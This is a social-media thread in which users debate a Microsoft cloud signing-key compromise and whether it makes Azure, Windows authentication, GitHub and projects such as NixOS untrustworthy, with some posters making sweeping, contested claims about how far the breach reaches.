After basically the whole #Microsoft#Azure cloud was hacked (see list of related sources on https://karl-voit.at/cloud/ ), the first follow-up incidents went public caused by missing containment actions:
If you didn't understand until now: basically EVERYTHING at Microsoft got hacked and Microsoft can't (or won't) get rid of the intruders. Everything authenticated by Microsoft is tainted. Even #Windows auth.
@publicvoit something I've argued for many years now: cloud providers are a much bigger target than any individual company so they are a) bound to be infiltrated by nation states and their "subsidiaries" and b) it will be nearly impossible to purge such actors completely from cloud systems because the scope will be global. Still financial and other high risk institutions insist that cloud is better than owning and managing their own hardware. Like with AGW, people pay attention too late.
@jonsnow@publicvoit this has been a mantra of security experts since "cloud" became a thing. The earliest reference I can find is 10 years old: https://grahamcluley.com/cloud-someone-elses-computer/
The problem with that (now meme) being it doesn't convey the enormous risk that it poses to those making the decision on where to run a workload in a world run by people that have been taught that IT isn't core business. Instead of a being a smaller risk of a hack, it actually became near 100% risk of a hack.
@gegs@publicvoit The first time I heard a super senior public-cloud security leader say "our assumptions have to include that at least one of our employees has more than one employer" was like 7 years ago. It's part of the conventional threat model these days. What makes you think that banks would be better at countering that particular threat than GCP or AWS?
@timbray@publicvoit I've "not been a fan" of Microsoft since the early 90's but Azure is no better or worse than other big cloud providers so I don't see a reason to single them out in this case, but please elaborate.
@timbray@publicvoit the question is quite precisely: what types of infrastructure have which associated risk. A cloud environment, when compromised, affects all its tennants at once. If you don't understand the implications, look up the history of the Gros Michel banana variety.
I keep thinking about all of the cloud "glitter" that gets tossed around as a distraction from the creaking monstrosity that lies behind the sales pitch.
Don't worry, your post is most certainly getting attention in my neck of the woods.
@publicvoit I hear so many positive things about this on various podcasts (you probably know the ones), but I once tried it and couldn't even get to a useable desktop environment. That was a while back but I will stick with other OSs for now; and maybe if I go immutable I will try #Fedora first
@publicvoit While I agree with you, there are issues, I worry that your framing is flirting with baseless conspiracies as you seems to be ignoring that there are many safeguards in place to avoid letting GitHub corrupt the whole project.
Even if we didn't use GitHub, you have to understand that NixOS / Nixpkgs cannot force anyone we are consuming packages of to migrate somewhere else.
You are jumping from MSFT got compromised at time T to MSFT is still compromised and all GH repos are compromised with full capabilities for attackers. This is one of my accusation.
> As far as I know, you can't protect yourself from a bad actor that has more or less full access to the GH infrastructure and backends.
Assuming this without proof is, to be honest, conspiracy.
I don't like Microsoft neither, but this is ridiculous.
@raito The bad actors had years of more or less full access to MS infrastructure.
Actors that can pull off such an attack are perfectly well aware of what to do so that they keep access when the original attack vector is not available any more.
This is standard procedure for each intrusion attack.
Furthermore, in such a situation, the original bad actors can provide any sort of access to interested parties.
Yes, it's hard to digest but that's absolutely standard IT sec reasoning.
@raito Furthermore, it's not just me who tries to explain the implications. Please read other sources that quote various security experts and how they judge the impact of this incident.
Assuming that nothing happened to GH is understandable from a project's point of view (effort! trust!) but nothing more than wishful thinking without any proof.
In IT sec, you always(!) assume the worst case just because of that. You can never be sure otherwise.
@publicvoit@raito Does NixOS not independently sign its updates and use checksums of the aggregate repo contents (not trusting git's mostly sha1-only setup) like Guix?
If it does those two things, there's very little a malicious host could do other than denial of service.
If it doesn't then uh yeah, it's broken and really should fix that post haste.
Yes, there is no proof or indication that anything happened to any GH repository yet. 👍
However, in IT security, you don't rely on lucky guess. A compromised network is still a compromised network and needs to be restarted from a clean status.
It doesn't look like MS is going to setup major parts of their infrastructure to introduce trustworthy hosts again.
> It doesn't look like MS is going to setup major parts of their infrastructure to introduce trustworthy hosts again.
I think you answered yourself very well.
In IT security, lucky guess are not primitives to build threat models. Hypotheses, assumptions, economics, politics, technical measures and careful analyses are.
What you are doing is just lucky guessing that MSFT didn't do any form of "reasonable" due diligence.
@raito After years of having a (potential) state actor in the back-end of MS, I'd be very interested in your assumptions that they really did not perform lateral movements and expand to linked networks.
No tech measures can mitigate or contain such an attack that lasted for so long in retrospect.
From an politics/economic perspective, we agree. We see what the economic decisions were already.
But that is strongly orthogonal to IT sec reasoning. Trade-offs won, as usual. But no proof.
@publicvoit But then, assuming the level of catastrophe you are describing.
What value is there in using a modern computer? NixOS/Nix is not the only thing affected. systemd is in GitHub, systemd developers are from Microsoft, etc, etc.
What is the usable advice we can get out of your whistleblowing?
@raito I'm not a whistleblower at all! I just quoted articles published by MS & independent sources.
I never said that we should stop using NixOS, systemd, ...
We just need to be aware that there is no such thing as a trustworthy cloud infrastructure most probably anywhere except you deal with it yourself to some degree.
All projects that rely on a pot. compromised infrastructure need to invest in mitigation measurements against malicious infrastr. which wasn't discussed so far AFAIK.
> I never said that we should stop using NixOS, systemd, ...
> We just need to be aware that there is no such thing as a trustworthy cloud infrastructure most probably anywhere except you deal with it yourself to some degree.
Right, but what you are saying is that NixOS is particularly reliant on GitHub whereas everyone is reliant on GitHub so…
> All projects that rely on a pot. compromised infrastructure need to invest in mitigation measurements against malicious infrastr. which wasn't discussed so far AFAIK.
We already touched base on some obvious mitigation measures we all enjoy thanks to the concept of Git repositories.
We have many more because of how nixpkgs works, but I admit I am slightly annoyed because you seem to be ignoring them and you didn't contact any expert matter, I assume?
@publicvoit The mass uptake of Microsoft's mail services has always rung alarm bells for me. Azure, particularly their 365 suite platform is too rich a target not to be hacked. Also, Azure is a late-comer. I've always felt it was a panicked rush to market.
When asked, I have always advised people to stay clear of any of it.
@publicvoit
And still leadership and several colleagues at one of the Danish Regional Hospital services insist on having office data and mail in MS cloud services. But of course no patient data will leak over... 🙄
@publicvoit One reason why I think it's unacceptable for our government and other autorities to use Azure or AWS services.
We used to have the KeePass database stored in webspace with our ISP (until KPN assimilated them).
It's now on a NAS, as is all our data, but securely backed up in the cloud (on in NL, one in Germany).
The cloud storage is used for sharing things, and thus as off-site backup (encrypted) for important data.
It's bad enough that basically for a mobile, the only real >2
@publicvoit All our own internal syncing is done via the NAS systems. So the personal data is synchronised between the desktop, netbook, and Ubuntu laptop.
The netbooks and Ubuntu laptop have a synchronised copy of the KeePass database. This to prevent an issue if our home connection would be offline if we are away.
@publicvoit@matthew_d_green “On July 3, Microsoft blocked usage of the key for all impacted consumer customers to prevent use of previously-issued tokens.”
@StevenBarnhart@matthew_d_green Years of access to the inner workings of Microsoft by a presumed state actor and you think that they did not think of creating their own certificates or even implant backdoors? 🤔
@publicvoit I haven't had any microshit account but I changed my job and then I have the job account there. I know I don't have anything personal there but I don't know what kind of personal data the company I work for is there. I always been very sceptical about moving everything to the fucking cloud and I have always been very critical about that.
Something I hate most it's people who don't have any fucking idea about anything telling us that we should move everything there.
@publicvoit good chance the decision to host StateDept emails on MS cloud was made during Trump admin. no specific knowledge of that but smart way to bet. man is a Russian traitor trying to sabotage the US every way he can get away with
@publicvoit We really need an user-friendly alternative to #GitHub. Love seeing that both @forgejo and #GitLab work on ActivityPub support. Can't wait to try it out.
I have really been baffled by the widespread loyalty to Microsoft by the #FreeSoftware community. I wonder if you have the answer… is it really user-friendliness that causes FOSS devs to embrace #Github with such strong loyalty as to ignore marginalization of people communities excluded by MS? I think of developers as quite technical so I would not have thought user-friendliness is that critical to a forge. #askFedi
In simple words: #Microsoft lost one of their master keys to unlock very important parts of their cloud. This connects to all MS services that do authenticate by MS which includes most #Windows setups as well.
This happened long time ago, some people think it was the Chinese.
They were able to implant #backdoors, self-made keys, ... all over the place.
In order to fix that, MS would need to kill all their connected hosts and start from scratch. It's obvious why they don't.
Add comment